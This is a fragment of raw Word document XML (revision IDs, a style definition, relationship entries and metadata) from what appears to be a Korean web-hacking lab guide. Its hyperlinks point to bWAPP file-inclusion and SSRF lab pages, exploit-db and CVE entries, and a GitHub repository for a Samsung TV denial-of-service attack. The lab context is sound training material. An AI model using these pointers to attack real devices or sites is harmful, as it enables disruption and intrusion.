    <w:rsid w:val="00DA2AA2"/>
    <w:rsid w:val="00DA4FBF"/>
    <w:rsid w:val="00DB6CF9"/>
    <w:rsid w:val="00DC0000"/>
    <w:rsid w:val="00DD0298"/>
    <w:rsid w:val="00DD3935"/>
    <w:rsid w:val="00DD61CA"/>
    <w:rsid w:val="00DE047E"/>
    <w:rsid w:val="00E00869"/>
    <w:rsid w:val="00E06B40"/>
    <w:rsid w:val="00E229DC"/>
    <w:rsid w:val="00E56F58"/>
    <w:rsid w:val="00E67AD9"/>
    <w:rsid w:val="00E67F58"/>
    <w:rsid w:val="00EA025D"/>
    <w:rsid w:val="00EB6153"/>
    <w:rsid w:val="00ED0816"/>
    <w:rsid w:val="00ED1AD5"/>
    <w:rsid w:val="00EE0AD3"/>
    <w:rsid w:val="00EE1881"/>
    <w:rsid w:val="00EE40AF"/>
    <w:rsid w:val="00EF7670"/>
    <w:rsid w:val="00EF77F1"/>
    <w:rsid w:val="00F06975"/>
    <w:rsid w:val="00F172BC"/>
    <w:rsid w:val="00F172E8"/>
    <w:rsid w:val="00F21CD1"/>
    <w:rsid w:val="00F25BB0"/>
    <w:rsid w:val="00F345F6"/>
    <w:rsid w:val="00F35A88"/>
    <w:rsid w:val="00F37367"/>
    <w:rsid w:val="00F43C2F"/>
    <w:rsid w:val="00F51421"/>
    <w:rsid w:val="00F577E0"/>
    <w:rsid w:val="00F630CF"/>
    <w:rsid w:val="00F667CD"/>
    <w:rsid w:val="00F70868"/>
    <w:rsid w:val="00F769B7"/>
    <w:rsid w:val="00FA3148"/>
    <w:rsid w:val="00FA36C7"/>
    <w:rsid w:val="00FA642A"/>
    <w:rsid w:val="00FB583C"/>
    <w:rsid w:val="00FC1ECD"/>
    <w:rsid w:val="00FE13B7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D0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183D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DF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515D7D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540A5"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ac">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D1AE2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4D0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D06E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D06E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D06E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D06E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1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2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www.securityfocus.com/bid/22727/info" TargetMode="External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hyperlink" Target="https://developers.whatismybrowser.com/useragents/explore/" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89.jpe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hyperlink" Target="http://172.30.1.10/bWAPP/rlfi.php?language=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97.png"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=U-R2epNnUiM" TargetMode="External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0.jpeg"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://&#48708;&#48149;&#49828;ip/evil/ssrf-1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98.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=9NZgLHYRg7g" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37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4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hyperlink" Target="https://github.com/r00t-3xp10it/Samsung-TV-Denial-of-Service-DoS-Attack.git" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.png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hyperlink" Target="https://addons.mozilla.org/ko/firefox/addon/user-agent-switcher-revived/?src=search" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.jpeg"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/27043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93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.jpeg"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8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59.png"/><Relationship Id="rId116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9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hyperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4890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jpeg"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://chrome.google.com/webstore/detail/user-agent-switcher-for-c/djflhoibgkdhkhhcedjiklpkjnoahfmg/related" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.jpeg"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.jpeg"/><Relationship Id="rId101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67C5-BA96-4FB3-BAE6-47A2F1B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0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tn</cp:lastModifiedBy>
  <cp:revision>131</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-01-10T15:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-01-12T14:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>